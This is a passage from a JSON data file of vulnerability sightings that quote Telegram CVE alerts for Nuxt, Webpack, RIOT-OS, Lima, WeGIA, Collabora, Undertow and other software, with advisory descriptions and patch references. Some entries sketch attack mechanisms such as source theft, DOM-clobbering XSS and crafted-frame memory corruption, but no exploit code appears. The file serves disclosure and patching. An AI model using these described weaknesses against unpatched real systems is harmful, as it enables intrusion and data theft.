2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-01-09T17:03:59.375Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0220\n5. https://access.redhat.com/errata/RHSA-2025:0221\n6. https://access.redhat.com/errata/RHSA-2025:0222\n7. https://access.redhat.com/security/cve/CVE-2024-11614\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-01-09T17:17:32.000000Z"}, {"uuid": "dcea5c5e-c467-453d-8e79-b621ea1f3fd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4GF7-FF8X-HQ99", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/3042", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24361\n\ud83d\udd39 Description: Nuxt is an open-source web development framework for Vue.js. Source code may be stolen during dev when using version 3.0.0 through 3.15.12 of the webpack builder or version 3.12.2 through 3.152 of the rspack builder and a victim opens a malicious web site. Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject a malicious script in their site and run the script. By using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code. Version 3.15.13 of Nuxt patches this issue.\n\ud83d\udccf Published: 2025-01-25T00:53:23.400Z\n\ud83d\udccf Modified: 2025-01-25T00:53:23.400Z\n\ud83d\udd17 References:\n1. https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99\n2. https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f", "creation_timestamp": "2025-01-25T01:05:09.000000Z"}, {"uuid": "50f9da46-311e-4970-b4dc-0b866e6f3ffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-675F-RQ2R-JW82", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/996", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22149\n\ud83d\udd39 Description: JWK Set (JSON Web Key Set) is a JWK and JWK Set Go implementation. Prior to 0.6.0, the project's provided HTTP client's local JWK Set cache should do a full replacement when the goroutine refreshes the remote JWK Set. The current behavior is to overwrite or append. This is a security issue for use cases that utilize the provided auto-caching HTTP client and where key removal from a JWK Set is equivalent to revocation. The affected auto-caching HTTP client was added in version v0.5.0 and fixed in v0.6.0. The only workaround would be to remove the provided auto-caching HTTP client and replace it with a custom implementation. This involves setting the HTTPClientStorageOptions.RefreshInterval to zero (or not specifying the value).\n\ud83d\udccf Published: 2025-01-09T17:22:59.757Z\n\ud83d\udccf Modified: 2025-01-09T18:09:01.964Z\n\ud83d\udd17 References:\n1. https://github.com/MicahParks/jwkset/security/advisories/GHSA-675f-rq2r-jw82\n2. https://github.com/MicahParks/jwkset/issues/40\n3. https://github.com/MicahParks/jwkset/commit/01db49a90f7f20c7fb39a699a2f19a7a5f379ed3", "creation_timestamp": "2025-01-09T18:16:03.000000Z"}, {"uuid": "8ba6d60f-4e35-42b5-bb34-c12fc90b42e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4VVJ-4CPR-P986", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1007", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-43788\n\ud83d\udd39 Description: Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2024-08-27T17:07:16.285Z\n\ud83d\udccf Modified: 2025-01-09T17:41:35.616Z\n\ud83d\udd17 References:\n1. https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\n2. https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270\n3. https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61\n4. https://research.securitum.com/xss-in-amp4email-dom-clobbering\n5. https://scnps.co/papers/sp23_domclob.pdf", "creation_timestamp": "2025-01-09T18:19:34.000000Z"}, {"uuid": "308f182f-faf5-483f-a0a9-be47252af76c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PG65-P24M-WF5G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1047", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33979\n\ud83d\udd39 Description: gpt_academic provides a graphical interface for ChatGPT/GLM. A vulnerability was found in gpt_academic 3.37 and prior. This issue affects some unknown processing of the component Configuration File Handler. The manipulation of the argument file leads to information disclosure. Since no sensitive files are configured to be off-limits, sensitive information files in some working directories can be read through the `/file` route, leading to sensitive information leakage. This affects users that uses file configurations via `config.py`, `config_private.py`, `Dockerfile`. A patch is available at commit 1dcc2873d2168ad2d3d70afcb453ac1695fbdf02. As a workaround, one may use environment variables instead of `config*.py` files to configure this project, or use docker-compose installation to configure this project.\n\ud83d\udccf Published: 2023-05-31T18:03:25.468Z\n\ud83d\udccf Modified: 2025-01-09T19:51:39.844Z\n\ud83d\udd17 References:\n1. https://github.com/binary-husky/gpt_academic/security/advisories/GHSA-pg65-p24m-wf5g\n2. https://github.com/binary-husky/gpt_academic/commit/1dcc2873d2168ad2d3d70afcb453ac1695fbdf02", "creation_timestamp": "2025-01-09T20:15:54.000000Z"}, {"uuid": "e89b509a-856c-44c8-b1cb-dd916704b7de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V856-WJH3-4RHG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1158", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22600\n\ud83d\udd39 Description: WeGIA is a web manager for charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the configuracao_doacao.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the avulso parameter. This vulnerability is fixed in 3.2.8.\n\ud83d\udccf Published: 2025-01-10T15:30:15.534Z\n\ud83d\udccf Modified: 2025-01-10T15:46:26.253Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v856-wjh3-4rhg", "creation_timestamp": "2025-01-10T16:03:18.000000Z"}, {"uuid": "ec20ea37-1a47-48b8-b0ce-64c2f91efc12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R2PV-3JQC-VH7W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1166", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33973\n\ud83d\udd39 Description: RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. In versions 2023.01 and prior, an attacker can send a crafted frame which is forwarded by the device. During encoding of the packet a NULL pointer dereference occurs. This crashes the device leading to denial of service. A patch is available at pull request 19678. There are no known workarounds.\n\ud83d\udccf Published: 2023-05-30T16:18:04.163Z\n\ud83d\udccf Modified: 2025-01-10T16:54:29.703Z\n\ud83d\udd17 References:\n1. https://github.com/RIOT-OS/RIOT/security/advisories/GHSA-r2pv-3jqc-vh7w\n2. https://github.com/RIOT-OS/RIOT/pull/19678\n3. https://github.com/RIOT-OS/RIOT/commit/c9d7863e5664a169035038628029bb07e090c5ff\n4. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/iphc/gnrc_sixlowpan_iphc.c#L1067\n5. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/iphc/gnrc_sixlowpan_iphc.c#L1495\n6. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/iphc/gnrc_sixlowpan_iphc.c#L1511\n7. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/iphc/gnrc_sixlowpan_iphc.c#L1644\n8. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/iphc/gnrc_sixlowpan_iphc.c#L1655", "creation_timestamp": "2025-01-10T17:03:35.000000Z"}, {"uuid": "11337c47-c8dd-47b3-b0bf-37d06b747844", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XFJ4-9G7W-F4GH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1165", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-24826\n\ud83d\udd39 Description: RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. Prior to version 2023.04, an attacker can send crafted frames to the device to trigger the usage of an uninitialized object leading to denial of service. This issue is fixed in version 2023.04. As a workaround, disable fragment forwarding or SFR.\n\ud83d\udccf Published: 2023-05-30T16:07:45.208Z\n\ud83d\udccf Modified: 2025-01-10T16:54:54.059Z\n\ud83d\udd17 References:\n1. https://github.com/RIOT-OS/RIOT/security/advisories/GHSA-xfj4-9g7w-f4gh\n2. https://github.com/RIOT-OS/RIOT/commit/287f030af20e829469cdf740606148018a5a220d\n3. https://github.com/RIOT-OS/RIOT/blob/ccbb304eae7b59e8aca24a6ffd095b5b3f7720ee/sys/net/gnrc/network_layer/sixlowpan/frag/sfr/gnrc_sixlowpan_frag_sfr.c#L402\n4. https://github.com/RIOT-OS/RIOT/blob/ccbb304eae7b59e8aca24a6ffd095b5b3f7720ee/sys/net/gnrc/network_layer/sixlowpan/frag/sfr/gnrc_sixlowpan_frag_sfr.c#L420", "creation_timestamp": "2025-01-10T17:03:32.000000Z"}, {"uuid": "479d7033-4fba-4547-b54b-466e22702822", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F6FF-G7MH-58Q4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1168", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33975\n\ud83d\udd39 Description: RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. In version 2023.01 and prior, an attacker can send a crafted frame to the device resulting in an out of bounds write in the packet buffer. The overflow can be used to corrupt other packets and the allocator metadata. Corrupting a pointer will easily lead to denial of service. While carefully manipulating the allocator metadata gives an attacker the possibility to write data to arbitrary locations and thus execute arbitrary code. This issue is fixed in pull request 19680. As a workaround, disable support for fragmented IP datagrams.\n\ud83d\udccf Published: 2023-05-30T17:08:41.903Z\n\ud83d\udccf Modified: 2025-01-10T16:53:00.824Z\n\ud83d\udd17 References:\n1. https://github.com/RIOT-OS/RIOT/security/advisories/GHSA-f6ff-g7mh-58q4\n2. https://github.com/RIOT-OS/RIOT/pull/19680\n3. https://github.com/RIOT-OS/RIOT/commit/1aeb90ee5555ae78b567a6365ae4ab71bfd1404b\n4. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/frag/rb/gnrc_sixlowpan_frag_rb.c#L320\n5. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/frag/rb/gnrc_sixlowpan_frag_rb.c#L388\n6. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/frag/rb/gnrc_sixlowpan_frag_rb.c#L463\n7. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/frag/rb/gnrc_sixlowpan_frag_rb.c#L467\n8. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/frag/rb/gnrc_sixlowpan_frag_rb.c#L480", "creation_timestamp": "2025-01-10T17:03:39.000000Z"}, {"uuid": "1d8abd08-8541-4530-994a-ba78cf780efc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F7QW-JJ9C-RPQ9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1169", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32684\n\ud83d\udd39 Description: Lima launches Linux virtual machines, typically on macOS, for running containerd. Prior to version 0.16.0, a virtual machine instance with a malicious disk image could read a single file on the host filesystem, even when no filesystem is mounted from the host. The official templates of Lima and the well-known third party products (Colima, Rancher Desktop, and Finch) are unlikely to be affected by this issue. To exploit this issue, the attacker has to embed the target file path (an absolute or a relative path from the instance directory) in a malicious disk image, as the qcow2 (or vmdk) backing file path string. As Lima refuses to run as the root, it is practically impossible for the attacker to read the entire host disk via `/dev/rdiskN`. Also, practically, the attacker cannot read at least the first 512 bytes (MBR) of the target file. The issue has been patched in Lima in version 0.16.0 by prohibiting using a backing file path in the VM base image.\n\ud83d\udccf Published: 2023-05-30T17:19:17.148Z\n\ud83d\udccf Modified: 2025-01-10T16:52:10.831Z\n\ud83d\udd17 References:\n1. https://github.com/lima-vm/lima/security/advisories/GHSA-f7qw-jj9c-rpq9\n2. https://github.com/lima-vm/lima/commit/01dbd4d9cabe692afa4517be3995771f0ebb38a5\n3. https://github.com/lima-vm/lima/releases/tag/v0.16.0", "creation_timestamp": "2025-01-10T17:03:42.000000Z"}, {"uuid": "b17d2708-7d0b-4930-b6ae-c0466b32f534", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GWXV-JV83-6QJR", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1172", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33962\n\ud83d\udd39 Description: JStachio is a  type-safe Java Mustache templating engine. Prior to version 1.0.1, JStachio fails to escape single quotes `'` in HTML, allowing an attacker to inject malicious code. This vulnerability can be exploited by an attacker to execute arbitrary JavaScript code in the context of other users visiting pages that use this template engine. This can lead to various consequences, including session hijacking, defacement of web pages, theft of sensitive information, or even the propagation of malware.\n\nVersion 1.0.1 contains a patch for this issue. To mitigate this vulnerability, the template engine should properly escape special characters, including single quotes. Common practice is to escape `'` as `'`. As a workaround, users can avoid this issue by using only double quotes `\"` for HTML attributes.\n\ud83d\udccf Published: 2023-05-30T21:42:45.681Z\n\ud83d\udccf Modified: 2025-01-10T16:49:18.789Z\n\ud83d\udd17 References:\n1. https://github.com/jstachio/jstachio/security/advisories/GHSA-gwxv-jv83-6qjr\n2. https://github.com/jstachio/jstachio/issues/157\n3. https://github.com/jstachio/jstachio/pull/158\n4. https://github.com/jstachio/jstachio/commit/7b2f78377d1284df14c580be762a25af5f8dcd66\n5. https://github.com/jstachio/jstachio/releases/tag/v1.0.1", "creation_timestamp": "2025-01-10T17:03:49.000000Z"}, {"uuid": "12d719b6-7f4b-4840-abcd-1633bef8b9c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-359M-FP6Q-65R7", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1171", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33961\n\ud83d\udd39 Description: Leantime is a lean open source project management system. Starting in version 2.3.21, an authenticated user with commenting privileges can inject malicious Javascript into a comment. Once the malicious comment is loaded in the browser by a user, the malicious Javascript code executes. As of time of publication, a patch does not exist.\n\ud83d\udccf Published: 2023-05-30T21:34:00.659Z\n\ud83d\udccf Modified: 2025-01-10T16:49:49.901Z\n\ud83d\udd17 References:\n1. https://github.com/Leantime/leantime/security/advisories/GHSA-359m-fp6q-65r7", "creation_timestamp": "2025-01-10T17:03:46.000000Z"}, {"uuid": "7d78c6f2-6d3c-4c5e-a9c7-3fb1f13c6907", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QJRQ-HM79-49WW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1233", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32691\n\ud83d\udd39 Description: gost (GO Simple Tunnel) is a simple tunnel written in golang. Sensitive secrets such as passwords, token and API keys should be compared only using a constant-time comparison function. Untrusted input, sourced from a HTTP header, is compared directly with a secret. Since this comparison is not secure, an attacker can mount a side-channel timing attack to guess the password. As a workaround, this can be easily fixed using a constant time comparing function such as `crypto/subtle`'s `ConstantTimeCompare`. \n\n\ud83d\udccf Published: 2023-05-30T03:06:06.080Z\n\ud83d\udccf Modified: 2025-01-10T20:45:20.000Z\n\ud83d\udd17 References:\n1. https://github.com/ginuerzh/gost/security/advisories/GHSA-qjrq-hm79-49ww\n2. https://github.com/ginuerzh/gost/blob/1c62376e0880e4094bd3731e06bd4f7842638f6a/auth.go#L46", "creation_timestamp": "2025-01-10T21:04:06.000000Z"}, {"uuid": "08b6faef-a377-4efd-85f6-7320652bc337", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7582-PWFH-3PWR", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1049", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-34088\n\ud83d\udd39 Description: Collabora Online is a collaborative online office suite. A stored cross-site scripting (XSS) vulnerability was found in Collabora Online prior to versions 22.05.13, 21.11.9.1, and 6.4.27. An attacker could create a document with an XSS payload as a document name. Later, if an administrator opened the admin console and navigated to the history page, the document name was injected as unescaped HTML and executed as a script inside the context of the admin console. The administrator JSON web token (JWT) used for the websocket connection could be leaked through this flaw. Users should upgrade to Collabora Online 22.05.13 or higher; Collabora Online 21.11.9.1 or higher; Collabora Online 6.4.27 or higher to receive a patch.\n\ud83d\udccf Published: 2023-05-31T18:15:42.895Z\n\ud83d\udccf Modified: 2025-01-09T19:51:07.042Z\n\ud83d\udd17 References:\n1. https://github.com/CollaboraOnline/online/security/advisories/GHSA-7582-pwfh-3pwr", "creation_timestamp": "2025-01-09T20:16:23.000000Z"}, {"uuid": "0ecd8139-c01a-40c8-a9a6-9779c53d84af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8354-6CXW-7G8C", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1155", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22599\n\ud83d\udd39 Description: WeGIA is a web manager for charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the home.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the msg_c parameter. This vulnerability is fixed in 3.2.8.\n\ud83d\udccf Published: 2025-01-10T15:29:46.506Z\n\ud83d\udccf Modified: 2025-01-10T15:50:15.244Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-8354-6cxw-7g8c", "creation_timestamp": "2025-01-10T16:03:07.000000Z"}, {"uuid": "d3552cd5-97da-4f80-aeb2-18618d569db0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5143", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1110", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-01-09T21:35:52.649Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-01-09T22:16:14.000000Z"}, {"uuid": "e91dfaee-d41c-44a9-803a-fa623f059d88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5145", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1110", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-01-09T21:35:52.649Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-01-09T22:16:14.000000Z"}, {"uuid": "9fcff5aa-c2c5-48a3-9aa7-db70638647af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6437", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1110", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-01-09T21:35:52.649Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-01-09T22:16:14.000000Z"}, {"uuid": "bd679232-f56e-41b0-bbaf-0a3610e1153f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5147", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1110", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-01-09T21:35:52.649Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-01-09T22:16:14.000000Z"}, {"uuid": "ec42678b-652e-4b3c-9936-02a38d7df4f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4392", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1110", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-01-09T21:35:52.649Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. https://access.redhat.com/errata/RHSA-2024:5144\n4. https://access.redhat.com/errata/RHSA-2024:5145\n5. https://access.redhat.com/errata/RHSA-2024:5147\n6. https://access.redhat.com/errata/RHSA-2024:6437\n7. https://access.redhat.com/security/cve/CVE-2024-3653\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2274437", "creation_timestamp": "2025-01-09T22:16:14.000000Z"}, {"uuid": "0104b336-1e2c-43fe-a0f6-52b0a4e1f72e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:5144", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1110", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3653\n\ud83d\udd39 Description: A vulnerability was found in Undertow. This issue requires enabling the learning-push handler in the server's config, which is disabled by default, leaving the maxAge config in the handler unconfigured. The default is -1, which makes the handler vulnerable. If someone overwrites that config, the server is not subject to the attack. The attacker needs to be able to reach the server with a normal HTTP request.\n\ud83d\udccf Published: 2024-07-08T21:21:20.899Z\n\ud83d\udccf Modified: 2025-01-09T21:35:52.649Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4392\n2. https://access.redhat.com/errata/RHSA-2024:5143\n3. 